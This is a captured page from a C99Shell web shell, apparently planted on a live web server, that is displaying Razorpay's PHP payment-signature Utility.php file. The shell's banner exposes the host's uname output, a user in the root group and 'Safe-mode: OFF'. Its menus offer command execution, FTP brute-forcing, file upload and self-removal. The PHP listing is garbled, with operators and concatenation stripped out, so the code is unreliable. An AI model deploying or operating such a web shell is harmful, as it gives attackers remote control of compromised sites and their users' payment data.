!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/vendor/razorpay/razorpay/src/   drwxr-xr-x
Free 28.19 GB of 117.98 GB (23.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Utility.php (2.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Razorpay\Api;

class 
Utility
{
    const 
SHA256 'sha256';

    public function 
verifyPaymentSignature($attributes)
    {
        
$actualSignature $attributes['razorpay_signature'];

        
$paymentId $attributes['razorpay_payment_id'];

        if (isset(
$attributes['razorpay_order_id']) === true)
        {
            
$orderId $attributes['razorpay_order_id'];

            
$payload $orderId '|' $paymentId;
        }
        else if (isset(
$attributes['razorpay_subscription_id']) === true)
        {
            
$subscriptionId $attributes['razorpay_subscription_id'];

            
$payload $paymentId '|' $subscriptionId;
        }
        else if (isset(
$attributes['razorpay_payment_link_id']) === true)
        {
            
$paymentLinkId     $attributes['razorpay_payment_link_id'];

            
$paymentLinkRefId  $attributes['razorpay_payment_link_reference_id'];

            
$paymentLinkStatus $attributes['razorpay_payment_link_status'];

            
$payload $paymentLinkId '|'$paymentLinkRefId '|' $paymentLinkStatus '|' $paymentId;
        }
        else
        {
            throw new 
Errors\SignatureVerificationError(
                
'Either razorpay_order_id or razorpay_subscription_id or razorpay_payment_link_id must be present.');
        }

        
$secret Api::getSecret();

        
self::verifySignature($payload$actualSignature$secret);
    }

    public function 
verifyWebhookSignature($payload$actualSignature$secret)
    {
        
self::verifySignature($payload$actualSignature$secret);
    }

    public function 
verifySignature($payload$actualSignature$secret)
    {
        
$expectedSignature hash_hmac(self::SHA256$payload$secret);

        
// Use lang's built-in hash_equals if exists to mitigate timing attacks
        
if (function_exists('hash_equals'))
        {
            
$verified hash_equals($expectedSignature$actualSignature);
        }
        else
        {
            
$verified $this->hashEquals($expectedSignature$actualSignature);
        }

        if (
$verified === false)
        {
            throw new 
Errors\SignatureVerificationError(
                
'Invalid signature passed');
        }
    }

    private function 
hashEquals($expectedSignature$actualSignature)
    {
        if (
strlen($expectedSignature) === strlen($actualSignature))
        {
            
$res $expectedSignature $actualSignature;
            
$return 0;

            for (
$i strlen($res) - 1$i >= 0$i--)
            {
                
$return |= ord($res[$i]);
            }

            return (
$return === 0);
        }

        return 
false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--